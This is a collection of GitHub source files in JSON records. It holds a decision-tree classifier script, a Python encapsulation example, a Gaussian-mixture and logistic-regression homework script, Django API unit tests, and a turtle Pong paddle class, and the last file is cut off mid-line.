+{"seq_id":"44885384315","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[77]:\n\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\n\n# In[79]:\n\n\nclass Node:\n def __init__(self):\n self.label = None\n self.best_cond = None\n self.split_value = None\n self.left = None\n self.right = None\n\n\n# In[75]:\n\n\nclass tree:\n def __init__(self,tree_structure):\n self.i = 0\n self.tree_structure = tree_structure\n self.root = self.tree_growth()\n \n def tree_growth(self):\n if(self.tree_structure[self.i,0] == -2):\n leaf = Node()\n leaf.label = self.tree_structure[self.i,1]\n self.i += 1\n return leaf\n else:\n root = Node()\n root.best_cond = self.tree_structure[self.i,0]\n root.split_value = self.tree_structure[self.i,1]\n self.i += 1\n root.left = self.tree_growth()\n root.right = self.tree_growth()\n return root\n \n def predict(self,testX):\n predicted_labels=[]\n for img in testX:\n checking_node = self.root\n while checking_node.label == None:\n if img[int(checking_node.best_cond)] < checking_node.split_value:\n checking_node = checking_node.left\n else:\n checking_node = checking_node.right\n predicted_labels.append(checking_node.label)\n return np.array(predicted_labels)\n \n\n\n# In[80]:\n\n\ndef main(model_file,test_file,prediction):\n tree_structure = np.loadtxt(model_file,delimiter=\",\")\n test_data = pd.read_csv(test_file,header=None).values\n testX = test_data[:,1:]\n testy = test_data[:,0]\n \n new_tree = tree(tree_structure)\n predicted_labels = new_tree.predict(testX)\n outcome = []\n for truth,predict in zip(testy,predicted_labels):\n outcome.append((truth,predict))\n outcome=np.array(outcome,dtype=int)\n np.savetxt(prediction,outcome,delimiter=\",\", fmt=\"%d\")\n\nif __name__ == '__main__':\n model_file = sys.argv[1]\n test_file = sys.argv[2]\n prediction = sys.argv[3]\n main(model_file,test_file,prediction)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"nnnnnnnnt/Course-HWs-Projects","sub_path":"CSCI 5523 18Fall/DecisionTreeClassifier/dtclassify.py","file_name":"dtclassify.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7546024356","text":"#encapsulation\n#python public, private, protected variables\n\nclass myCapsule:\n def __init__(self):\n self.a = 10 #a = public\n self._b = 20 #b = partially private, but convention, can be accessed\n self.__c = 30 #c = private, restricted \n def public_method(self):\n print(self.__c)\n print(\"Hi from public method\")\n self.__private_method() #now you can access\n\n def __private_method(self):\n print(\"Hello from private method\") #can't be used outside the class \n\n\n\n\n\ncapsule1 = myCapsule()\n\nprint(capsule1.a) #will print\nprint(capsule1._b) #will print\n#print(capsule1.__c) #won't print\n\ncapsule1.public_method() # now c can be printed","repo_name":"TriptoAfsin/Tripto-s-Python-3-Basics","sub_path":"4(OOP)/encaplusation/privateMethod.py","file_name":"privateMethod.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22154238758","text":"from random import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.mixture import GaussianMixture as GMM\ndef sample_distribution(n, p0, p1):\n\n N0 = 0\n N1 = 0\n for i in range(n):\n if random() < p0:\n N0 = N0 + 1\n else:\n N1 = N1 + 1\n return (N0, N1)\n\ndef 
generate_gaussian_samples(num_sample, w, mu, cov):\n if len(w) > 1:\n no_gaussian_samples = sample_distribution(num_sample, w[0], w[1])\n else:\n no_gaussian_samples = tuple([num_sample])\n datapoints = list()\n for i in range(len(no_gaussian_samples)):\n if len(datapoints) == 0:\n datapoints = np.random.multivariate_normal(mu[i], cov[i], no_gaussian_samples[i])\n else:\n datapoints = np.append(datapoints,np.random.multivariate_normal(mu[i], cov[i],no_gaussian_samples[i]),axis=0,)\n return datapoints\ndef plot_datapoints_scatter(datapoints, labels, xlabel, ylabel, title):\n n0 = calculate_no_labels(labels, 0)\n print(n0)\n n1 = len(datapoints) - n0\n print(n1)\n plt.scatter(datapoints[:n0, 0], datapoints[:n0, 1], c='b', label='class 0')\n plt.scatter(datapoints[n0:, 0], datapoints[n0:, 1], c='r', label='class 1')\n plt.title(title)\n plt.legend()\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\ndef plot_contours(data, means, covs, title):\n \"\"\"visualize the gaussian components over the data\"\"\"\n plt.figure()\n plt.plot(data[:, 0], data[:, 1], 'ko')\n delta = 0.025\n k = means.shape[0]\n x = np.arange(-4.0, 10.0, delta)\n y = np.arange(-4.0, 10.0, delta)\n x_grid, y_grid = np.meshgrid(x, y)\n coordinates = np.array([x_grid.ravel(), y_grid.ravel()]).T\n col = ['green', 'red', 'indigo']\n for i in range(k):\n mean = means[i]\n cov = covs[i]\n z_grid = multivariate_normal(mean,\n cov).pdf(coordinates).reshape(x_grid.shape)\n plt.contour(x_grid, y_grid, z_grid, colors=col[i])\n plt.title(title)\n plt.tight_layout()\ndef calculate_discriminant(datapoints, mu0, w0, cov0, mu1, cov1):\n data_discriminant = list()\n for i in tqdm(range(len(datapoints)), total=len(datapoints), desc=\"calcdata_discriminant\"):\n val = np.log(multivariate_normal.pdf(datapoints[i], mu1[0], cov1[0])/ (w0[0] * multivariate_normal.pdf(datapoints[i], mu0[0], cov0[0])+ w0[1] * multivariate_normal.pdf(datapoints[i], mu0[1], cov0[1])))\n data_discriminant.append(val)\n return data_discriminant\ndef data_points_labels_preproc(data_points, data_labels):\n data_labels = np.append(np.array([data_labels]), np.array([np.zeros(len(data_labels))]), axis=0)\n data_points = np.append(np.array([data_points[:, 0]]), np.array([data_points[:, 1]]), axis=0)\n return (data_points, data_labels)\ndef hit_cls(data_discriminant, data_labels):\n false_positive = list()\n true_positive = list()\n gamma_values = list()\n prob_error = list()\n no_0_labels = calculate_no_labels(data_labels=data_labels, label_value=0)\n no_1_labels = calculate_no_labels(data_labels=data_labels, label_value=1)\n data_discriminant_label0 = data_discriminant[0:no_0_labels]\n data_discriminant_label1 = data_discriminant[no_0_labels:]\n for i in tqdm(sorted(data_discriminant), total=len(data_discriminant), desc=\"hitclassifier\"):\n fp = len([j for j in data_discriminant_label0 if j >= i]) / no_0_labels\n tp = len([j for j in data_discriminant_label1 if j >= i]) / no_1_labels\n false_positive.append(fp)\n true_positive.append(tp)\n gamma_values.append(i)\n prob_error.append(fp * p0 + (1 - tp) * p1)\n return false_positive, true_positive, gamma_values, prob_error\ndef calculate_no_labels(data_labels, label_value):\n count = 0\n for i in data_labels:\n if i == label_value:\n count += 1\n return count\ndef find_estimated_params(train_data_points, train_data_labels):\n n0 = calculate_no_labels(data_labels=train_data_labels, label_value=0)\n GMMmodel = GMM(n_components=2, max_iter=100, tol=1e-3,covariance_type='full')\n GMMmodel.fit(train_data_points[0:n0])\n GMMmodel2 = 
GMM(n_components=1, max_iter=100, tol=1e-3,covariance_type='full')\n GMMmodel2.fit(train_data_points[n0:])\n return GMMmodel, GMMmodel2\ndef find_theta(train_data, alpha, iterations, train_labels, test_data, type_='l'):\n if type_ == 'l':\n z = np.c_[np.ones((train_data.shape[1])), train_data.T].T\n w = np.zeros((3, 1))\n else:\n z = np.c_[np.ones((train_data.shape[1])),train_data[0],train_data[1],train_data[0] * train_data[0],train_data[0] * train_data[1],train_data[1] * train_data[1],].T\n w = np.zeros((6, 1))\n for i in range(iterations):\n h = 1 / (1 + np.exp(-(np.dot(w.T, z))))\n cost_gradient = (1 / float(z.shape[1])) * np.dot(z, (h - train_labels[0]).T)\n w = w - alpha * cost_gradient\n print(w)\n if type_ == 'l':\n z = np.c_[np.ones((test_data.shape[1])), test_data.T].T\n else:\n z = np.c_[np.ones((test_data.shape[1])),test_data[0],test_data[1],test_data[0] * test_data[0],test_data[0] * test_data[1],test_data[1] * test_data[1],].T\n decisions = np.zeros((1, test_data.shape[1]))\n h = 1 / (1 + np.exp(-(np.dot(w.T, z))))\n decisions[0, :] = (h[0, :] >= 0.5).astype(int)\n return (w, decisions)\ndef plot_boundary(labels, W, flag, datapoints):\n X = datapoints\n x00 = [i for i in range(labels.shape[1]) if (labels[0, i] == 0 and labels[1, i] == 0)]\n x01 = [i for i in range(labels.shape[1]) if (labels[0, i] == 0 and labels[1, i] == 1)]\n x10 = [i for i in range(labels.shape[1]) if (labels[0, i] == 1 and labels[1, i] == 0)]\n x11 = [i for i in range(labels.shape[1]) if (labels[0, i] == 1 and labels[1, i] == 1)]\n plt.plot(X[0, x00], X[1, x00], '.', color='g', markersize=6)\n plt.plot(X[0, x01], X[1, x01], '.', color='r', markersize=6)\n plt.plot(X[0, x11], X[1, x11], '+', color='g', markersize=6)\n plt.plot(X[0, x10], X[1, x10], '+', color='r', markersize=6)\n plt.xlabel(\"Feature x1\")\n plt.ylabel(\"Feature x2\")\n plt.title('Distribution after classification overlapped by decision boundaries')\n plt.legend([\"class 0 correctly classified\",'class 0 wrongly classified','class 1 correctly classified','class 1 wrongly classified',])\n horizontalGrid = np.linspace(np.floor(min(X[0, :])), np.ceil(max(X[0, :])), 100)\n verticalGrid = np.linspace(np.floor(min(X[1, :])), np.ceil(max(X[1, :])), 100)\n dsg = np.zeros((100, 100))\n a = np.array(np.meshgrid(horizontalGrid, verticalGrid))\n for i in range(100):\n for j in range(100):\n x1 = a[0][i][j]\n x2 = a[1][i][j]\n if flag == 'l':\n z = np.c_[1, x1, x2].T\n else:\n z = np.c_[1, x1, x2, pow(x1, 2), x1 * x2, pow(x2, 2)].T\n dsg[i][j] = np.sum(np.dot(W, z))\n plt.contour(a[0], a[1], dsg, levels=[0])\n plt.show()\n return\nif __name__ == '__main__':\n p0 = 0.6\n p1 = 0.4\n # mu and sigma's\n mu0 = list([np.transpose([5, 0]), np.transpose([0, 4])])\n cov0 = list([np.array([[4, 0], [0, 2]]), np.array([[1, 0], [0, 3]])])\n mu1 = list([np.transpose([3, 2])])\n cov1 = list([np.array([[2, 0], [0, 2]])])\n w0 = list([0.5, 0.5])\n w1 = list([1])\n # 100 dataset\n l0, l1 = sample_distribution(100, p0, p1)\n r0 = generate_gaussian_samples(num_sample=l0, w=w0, mu=mu0,cov=cov0)\n l0 = [0] * len(r0)\n r1 = generate_gaussian_samples(num_sample=l1, w=w1, mu=mu1,cov=cov1)\n l1 = [1] * len(r1)\n data_100_datapoints = np.append(r0, r1, axis=0)\n data_100_labels = l0 + l1\n # 1000 dataset\n l0, l1 = sample_distribution(1000, p0, p1)\n r0 = generate_gaussian_samples(num_sample=l0, w=w0, mu=mu0,cov=cov0)\n l0 = [0] * len(r0)\n r1 = generate_gaussian_samples(num_sample=l1, w=w1, mu=mu1,cov=cov1)\n l1 = [1] * len(r1)\n data_1000_datapoints = np.append(r0, r1, axis=0)\n 
data_1000_labels = l0 + l1\n    # 10000 dataset\n    l0, l1 = sample_distribution(10000, p0, p1)\n    r0 = generate_gaussian_samples(num_sample=l0, w=w0, mu=mu0,cov=cov0)\n    l0 = [0] * len(r0)\n    r1 = generate_gaussian_samples(num_sample=l1, w=w1, mu=mu1,cov=cov1)\n    l1 = [1] * len(r1)\n    data_10000_datapoints = np.append(r0, r1, axis=0)\n    data_10000_labels = l0 + l1\n    # 20000 dataset\n    n0, n1 = sample_distribution(20000, p0, p1)\n    r0 = generate_gaussian_samples(num_sample=n0, w=w0, mu=mu0,cov=cov0)\n    l0 = [0] * len(r0)\n    r1 = generate_gaussian_samples(num_sample=n1, w=w1, mu=mu1,cov=cov1)\n    l1 = [1] * len(r1)\n    data_20000_datapoints = np.append(r0, r1, axis=0)\n    data_20000_labels = l0 + l1\n    fig0 = plt.figure(0)\n    title = "20k datapoints from 2 classes"\n    plot_datapoints_scatter(datapoints=data_20000_datapoints,labels=data_20000_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n    plt.savefig('20k_distribution.png', bbox_inches='tight')\n    plt.show()\n    title = "10k datapoints from 2 classes"\n    plot_datapoints_scatter(datapoints=data_10000_datapoints,labels=data_10000_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n    plt.savefig('10k_distribution.png', bbox_inches='tight')\n    plt.show()\n    title = "1000 datapoints from 2 classes"\n    plot_datapoints_scatter(datapoints=data_1000_datapoints,labels=data_1000_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n    plt.savefig('1k_distribution.png', bbox_inches='tight')\n    plt.show()\n    title = "100 datapoints from 2 classes"\n    plot_datapoints_scatter(datapoints=data_100_datapoints,labels=data_100_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n    plt.savefig('100_distribution.png', bbox_inches='tight')\n    plt.show()\n    # PART A\n    print(\"-\" * 10 + \"PART A\" + \"-\" * 10)\n    # theoretical gamma = p0/p1 = 1.5; calculating discriminant scores for data_20000\n    data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mu0,w0=(0.5, 0.5),cov0=cov0,mu1=mu1,cov1=cov1,)\n    data_20000_discriminant = data_20000_discriminant + [0]\n    false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n    min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n    print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n    print(\"experimental_min_error \", min_error)\n    no_0_labels = calculate_no_labels(data_labels=data_20000_labels,label_value=0)\n    no_1_labels = calculate_no_labels(data_labels=data_20000_labels,label_value=1)\n    data_20000_discriminant_label0 = data_20000_discriminant[0:no_0_labels]\n    data_20000_discriminant_label1 = data_20000_discriminant[no_0_labels:]\n    # decide class 1 when the log-likelihood ratio exceeds log(p0/p1), the MAP threshold for 0-1 loss\n    theoretical_fp = (len([j for j in data_20000_discriminant_label0 if j >= np.log(p0 / p1)]) /no_0_labels)\n    theoretical_tp = (len([j for j in data_20000_discriminant_label1 if j >= np.log(p0 / p1)]) /no_1_labels)\n    print(\"theoretical min_error \", theoretical_fp * p0 + (1 - theoretical_tp) * p1)\n    fig1 = plt.figure(1)\n    plt.plot(false_positive, true_positive, label=\"ROC_CURVE\")\n    plt.plot(false_positive[min_index],true_positive[min_index],\"ro\",label=\"Experimental min error\",)\n    plt.plot(theoretical_fp, theoretical_tp, \"g+\", label=\"Theoretical min error\")\n    plt.title(\"Minimum Expected risk ROC_CURVE\")\n    plt.xlabel(\"P(False Positive)\")\n    plt.ylabel(\"P(Correct prediction)\")\n    plt.legend()\n    plt.savefig('Minimum Expected risk ROC_CURVE.png', bbox_inches='tight')\n    plt.show()\n    # # PART B\n    print(\"-\" * 10 + \"PART B\" + \"-\" * 10)\n    print(\"-\" * 5 + \"TRAINING WITH 10000 data points\" + \"-\" * 5)\n
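    # The per-class MLE fit below relies on sklearn's GaussianMixture; a\n    # minimal sketch of the idea (illustrative, mirroring find_estimated_params):\n    #   gmm0 = GMM(n_components=2).fit(X[y == 0])   # class 0: 2-component mixture\n    #   gmm1 = GMM(n_components=1).fit(X[y == 1])   # class 1: single Gaussian\n    #   gmm0.means_, gmm0.covariances_, gmm0.weights_   # estimated parameters\n    GMMmodel, GMMmodel2 = 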
find_estimated_params(train_data_points=data_10000_datapoints,train_data_labels=data_10000_labels)\n    mle_mu0 = GMMmodel.means_\n    mle_cov0 = GMMmodel.covariances_\n    mle_mu1 = GMMmodel2.means_\n    mle_cov1 = GMMmodel2.covariances_\n    mle_alpha0 = GMMmodel.weights_\n    mle_alpha1 = GMMmodel2.weights_\n    print(\"estimated parameters\")\n    print(f\"mu0 {mle_mu0}\")\n    print(f\"cov0 {mle_cov0}\")\n    print(f\"alpha0 {mle_alpha0}\")\n    print(f\"mu1 {mle_mu1}\")\n    print(f\"cov1 {mle_cov1}\")\n    print(f\"alpha1 {mle_alpha1}\")\n    n0 = calculate_no_labels(data_labels=data_10000_labels, label_value=0)\n    print(f\"p(0) = {n0/10000} and p(1) = {1-(n0/10000)}\")\n    data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mle_mu0,w0=(0.5, 0.5),cov0=mle_cov0,mu1=mle_mu1,cov1=mle_cov1,)\n    data_20000_discriminant = data_20000_discriminant + [0]\n    false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n    min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n    print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n    print(\"experimental_min_error \", min_error)\n    \n    plt.plot(false_positive, true_positive, label=\"ROC_CURVE 10000 dataset\",c=\"r\")\n    plt.plot(false_positive[min_index],true_positive[min_index],\"ro\",\n             label=\"Experimental min error for dataset 10000\",)\n    print(\"-\" * 5 + \"TRAINING WITH 1000 data points\" + \"-\" * 5)\n    GMMmodel, GMMmodel2 = find_estimated_params(train_data_points=data_1000_datapoints,train_data_labels=data_1000_labels)\n    mle_mu0 = GMMmodel.means_\n    mle_cov0 = GMMmodel.covariances_\n    mle_mu1 = GMMmodel2.means_\n    mle_cov1 = GMMmodel2.covariances_\n    mle_alpha0 = GMMmodel.weights_\n    mle_alpha1 = GMMmodel2.weights_\n    print(\"estimated parameters\")\n    print(f\"mu0 {mle_mu0}\")\n    print(f\"cov0 {mle_cov0}\")\n    print(f\"alpha0 {mle_alpha0}\")\n    print(f\"mu1 {mle_mu1}\")\n    print(f\"cov1 {mle_cov1}\")\n    print(f\"alpha1 {mle_alpha1}\")\n    n0 = calculate_no_labels(data_labels=data_1000_labels, label_value=0)\n    print(f\"p(0) = {n0/1000} and p(1) = {1-(n0/1000)}\")\n    data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mle_mu0,w0=(0.5, 0.5),cov0=mle_cov0,mu1=mle_mu1,cov1=mle_cov1,)\n    data_20000_discriminant = data_20000_discriminant + [0]\n    false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n    min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n    print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n    print(\"experimental_min_error \", min_error)\n    plt.plot(false_positive, true_positive, label=\"ROC_CURVE 1000 dataset\",c=\"g\")\n    plt.plot(false_positive[min_index],true_positive[min_index],\"go\",\n             label=\"Experimental min error for dataset 1000 \",)\n    \n    print(\"-\" * 5 + \"TRAINING WITH 100 data points\" + \"-\" * 5)\n    GMMmodel, GMMmodel2 = find_estimated_params(train_data_points=data_100_datapoints, train_data_labels=data_100_labels)\n    mle_mu0 = GMMmodel.means_\n    mle_cov0 = GMMmodel.covariances_\n    mle_mu1 = GMMmodel2.means_\n    mle_cov1 = GMMmodel2.covariances_\n    mle_alpha0 = GMMmodel.weights_\n    mle_alpha1 = GMMmodel2.weights_\n    print(\"estimated parameters\")\n    print(f\"mu0 {mle_mu0}\")\n    print(f\"cov0 {mle_cov0}\")\n    print(f\"alpha0 {mle_alpha0}\")\n    print(f\"mu1 {mle_mu1}\")\n    print(f\"cov1 {mle_cov1}\")\n    print(f\"alpha1 {mle_alpha1}\")\n    n0 = calculate_no_labels(data_labels=data_100_labels, label_value=0)\n    print(f\"p(0) = {n0/100} and p(1) = {1-(n0/100)}\")\n
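    # Each of the three trained models is scored below on the same\n    # 20000-sample hold-out set, so their ROC curves are directly comparable.\n    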
data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mle_mu0,w0=(0.5, 0.5),cov0=mle_cov0,mu1=mle_mu1,cov1=mle_cov1,)\n data_20000_discriminant = data_20000_discriminant + [0]\n false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n print(\"experimental_min_error \", min_error)\n plt.plot(false_positive, true_positive, label=\"ROC_CURVE 100 dataset\",c=\"b\")\n plt.plot(false_positive[min_index],true_positive[min_index],\"bo\",label=\"Experimental min error for dataset 100\",)\n \n plt.title(\"Minimum Expected risk roc for training data\")\n plt.xlabel(\"P(False Positive)\")\n plt.ylabel(\"P(Correct prediction)\")\n plt.legend()\n plt.savefig('part2_all.png', bbox_inches='tight')\n plt.show()\n #exit()\n # PART C\n print(\"-\" * 10 + \"PART C\" + \"-\" * 10)\n data_20000_datapoints, data_20000_labels = data_points_labels_preproc(data_points=data_20000_datapoints, data_labels=data_20000_labels)\n data_10000_datapoints, data_10000_labels = data_points_labels_preproc(data_points=data_10000_datapoints, data_labels=data_10000_labels)\n data_1000_datapoints, data_1000_labels = data_points_labels_preproc(data_points=data_1000_datapoints, data_labels=data_1000_labels)\n data_100_datapoints, data_100_labels = data_points_labels_preproc(data_points=data_100_datapoints, data_labels=data_100_labels)\n w_100, decisions_100 = find_theta(train_data=data_100_datapoints,alpha=0.01,iterations=2000,train_labels=data_100_labels,test_data=data_20000_datapoints,type_='l',)\n w_1000, decisions_1000 = find_theta(train_data=data_1000_datapoints,alpha=0.01,iterations=2000,train_labels=data_1000_labels,test_data=data_20000_datapoints,type_='l',)\n w_10000, decisions_10000 = find_theta(train_data=data_10000_datapoints,alpha=0.01,iterations=2000,train_labels=data_10000_labels,test_data=data_20000_datapoints,type_='l',)\n for decisions in [decisions_100, decisions_1000, decisions_10000]:\n x00 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 0 and decisions[0, i] == 0)]\n x11 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 1 and decisions[0, i] == 1)]\n print(1 - ((len(x00) + len(x11)) / 20000))\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_100)),w_100.T,'l',data_20000_datapoints,)\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_1000)),w_1000.T,'l',data_20000_datapoints,)\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_10000)),w_10000.T,'l',data_20000_datapoints,)\n w_100, decisions_100 = find_theta(train_data=data_100_datapoints,alpha=0.01,iterations=2000,train_labels=data_100_labels,test_data=data_20000_datapoints,type_='r',)\n w_1000, decisions_1000 = find_theta(train_data=data_1000_datapoints,alpha=0.01,iterations=2000,train_labels=data_1000_labels,test_data=data_20000_datapoints,type_='r',)\n w_10000, decisions_10000 = find_theta(train_data=data_10000_datapoints,alpha=0.01,iterations=2000,train_labels=data_10000_labels,test_data=data_20000_datapoints,type_='r',)\n for decisions in [decisions_100, decisions_1000, decisions_10000]:\n x00 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 0 and decisions[0, i] == 0)]\n x11 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 1 and decisions[0, i] == 1)]\n print(1 - ((len(x00) + len(x11)) / 20000))\n plot_boundary(\n np.vstack((data_20000_labels[0, :], 
decisions_100)),w_100.T,'r',data_20000_datapoints,)\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_1000)),w_1000.T,'r',data_20000_datapoints,)\n plot_boundary( np.vstack((data_20000_labels[0, :], decisions_10000)),w_10000.T,'r',data_20000_datapoints,)","repo_name":"Pavan-r-shetty/5644","sub_path":"hw3/HW3_1.py","file_name":"HW3_1.py","file_ext":"py","file_size_in_byte":19113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34717039100","text":"#! /usr/bin/env python3\nfrom oilserver import utils\nfrom freezegun import freeze_time\nfrom oilserver.tests.common_test_methods import (\n make_bug,\n make_bugoccurrence,\n ResourceTests,\n)\nfrom oilserver import models\nfrom oilserver.api.resources import get_bugoccurrence_filters\n\n\nclass TimeStampedBaseModelTest(ResourceTests):\n\n def test_save_generates_timestamps(self):\n with freeze_time(\"Jan 1 2000 00:00:00\"):\n timestamp1 = utils.time_now()\n # Environment uses TimeStampedBaseModel and is easy to\n # make.\n environment = models.Environment(name=\"environment\")\n environment.save()\n self.assertEqual(environment.created_at, timestamp1)\n self.assertEqual(environment.updated_at, timestamp1)\n with freeze_time(\"Jan 2 2000 00:00:00\"):\n timestamp2 = utils.time_now()\n environment.save()\n self.assertEqual(environment.created_at, timestamp1)\n self.assertEqual(environment.updated_at, timestamp2)\n\n\nclass CommonResourceTest(ResourceTests):\n \"\"\"Test custom code in CommonResource.\n\n CommonResource isn't a concrete resource, so we can't test it\n directly. These tests will run against resources that inherit it.\n \"\"\"\n\n def test_get_meta_only(self):\n \"\"\"Ensure only meta is returned when meta_only flag is in request.\"\"\"\n url = '/api/%s/servicestatus/?meta_only=true' % (self.version)\n response = self.api_client.get(\n url, format='json', authentication=self.get_credentials())\n response_dict = self.deserialize(response)\n self.assertEqual(response.status_code, 200,\n msg=\"Incorrect status code\")\n self.assertNotIn('objects', response_dict)\n\n\nclass EnvironmentResourceTest(ResourceTests):\n def test_get_specific_environment_by_name(self):\n \"\"\"GET a specific environment instance by its name.\"\"\"\n name = \"mock_production\"\n r_dict0 = self.make_environment_via_api(name)\n response = self.api_client.get('/api/{}/environment/by_name/{}/'\n .format(self.version, name),\n format='json',\n authentication=self.get_credentials())\n r_dict1 = self.deserialize(response)\n\n self.assertEqual(r_dict0, r_dict1)\n self.assertEqual(response.status_code, 200,\n msg=\"Incorrect status code\")\n\n\nclass BugResourceTest(ResourceTests):\n def retrieve_bug(self, uuid):\n url = '/api/%s/bug/%s/' % (self.version, uuid)\n response = self.api_client.get(\n url, format='json', authentication=self.get_credentials())\n self.assertEqual(\n response.status_code, 200, msg='Incorrect status code')\n response_dict = self.deserialize(response)\n return response_dict\n\n def test_filter_on_bugoccurrences(self):\n \"\"\"Make sure filtering on bug occurrences for a bug works.\n\n This tests BugResource.apply_filters.\n \"\"\"\n bugoccurrence = make_bugoccurrence()\n url = '/api/%s/bug/?knownbugregex__bugoccurrences__uuid=%s' % (\n self.version, bugoccurrence.uuid)\n response = self.api_client.get(\n url, format='json', authentication=self.get_credentials())\n self.assertEqual(response.status_code, 200,\n msg=\"Incorrect status code\")\n response_dict = 
self.deserialize(response)\n        self.assertEqual(\n            bugoccurrence.regex.bug.uuid,\n            response_dict['objects'][0]['uuid'],\n            msg=\"Expected bug from bugoccurrence.\")\n\n    def test_includes_bugoccurrence_count_zero(self):\n        bug = make_bug()\n        response_dict = self.retrieve_bug(bug.uuid)\n        self.assertEqual(0, response_dict['occurrence_count'])\n        self.assertNotIn('last_seen', response_dict)\n\n    def test_includes_bugoccurrence_count_nonzero(self):\n        bugoccurrence = make_bugoccurrence()\n        response_dict = self.retrieve_bug(bugoccurrence.regex.bug.uuid)\n        self.assertEqual(1, response_dict['occurrence_count'])\n\n    def test_includes_last_seen_time(self):\n        first_occurrence = make_bugoccurrence()\n        last_occurrence = make_bugoccurrence(regex=first_occurrence.regex)\n        response_dict = self.retrieve_bug(first_occurrence.regex.bug.uuid)\n        self.assertEqual(\n            last_occurrence.build.pipeline.completed_at,\n            response_dict['last_seen'])\n\n\nclass EmptyObject(object):\n    pass\n\n\nclass FakeQueryDict(dict):\n    def getlist(self, key):\n        return self[key]\n\n    def setlist(self, key, value):\n        if not hasattr(self, '_list_keys'):\n            self._list_keys = []\n        self._list_keys.append(key)\n        self[key] = value\n\n\ndef make_mock_bug_bundle():\n    bundle = EmptyObject()\n    bundle.obj = make_bug()\n    bundle.request = EmptyObject()\n    bundle.request.GET = FakeQueryDict()\n    return bundle\n\n\nclass GetBugOccurrenceFiltersTest(ResourceTests):\n    def test_ignores_non_bug_occurrence_filters(self):\n        bundle = make_mock_bug_bundle()\n        bundle.request.GET['knownbugregex__uuid'] = 'abc'\n        filters = get_bugoccurrence_filters(bundle)\n        self.assertEqual(\n            {'regex__bug__uuid': bundle.obj.uuid},\n            filters)\n\n    def test_includes_bug_occurrence_filters(self):\n        bundle = make_mock_bug_bundle()\n        key = 'knownbugregex__bugoccurrences__uuid'\n        bundle.request.GET[key] = \"abc\"\n        filters = get_bugoccurrence_filters(bundle)\n        expected_filters = {\n            'regex__bug__uuid': bundle.obj.uuid,\n            'uuid': \"abc\"\n        }\n        self.assertEqual(expected_filters, filters)\n\n    def test_includes_bug_occurrence_list_filters(self):\n        bundle = make_mock_bug_bundle()\n        list_key = 'knownbugregex__bugoccurrences__uuid__in'\n        bundle.request.GET.setlist(list_key, ['a', 'b'])\n        filters = get_bugoccurrence_filters(bundle)\n        expected_filters = {\n            'regex__bug__uuid': bundle.obj.uuid,\n            'uuid__in': ['a', 'b']\n        }\n        self.assertEqual(expected_filters, filters)\n","repo_name":"autonomouse/dashboard","sub_path":"weebl/oilserver/tests/tests_api.py","file_name":"tests_api.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2741966741","text":"from turtle import Turtle\r\n\r\n\r\n# CREATING A PADDLE CLASS\r\nclass Paddle(Turtle):\r\n    # the paddle class needs to take an input when it is initialized, we need a position to pass there\r\n    # the position will determine where the paddle needs to go to\r\n    def __init__(self, position):\r\n        super().__init__()\r\n        # now we are inside the paddle class which is the same as turtle class with some added extras\r\n        self.shape(\"square\")\r\n        self.color(\"white\")\r\n        self.shapesize(stretch_wid=5, stretch_len=1)\r\n        self.penup()\r\n        self.goto(position)\r\n\r\n
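    # Usage sketch (illustrative; the key bindings are assumed to live in the\r\n    # game's main file):\r\n    #   right_paddle = Paddle((350, 0))\r\n    #   screen.onkey(right_paddle.go_up, \"Up\")\r\n\r\n    # CREATING A GO_UP FUNCTION FOR PADDLE\r\n    def go_up(self):\r\n        # we are changing y position: it will be the current ycor position, but it's going to go up by 20px\r\n        # We use self.ycor() so that it's referring to the object that is created from this class\r\n        new_y = self.ycor() + 20\r\n        self.goto(self.xcor(), 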
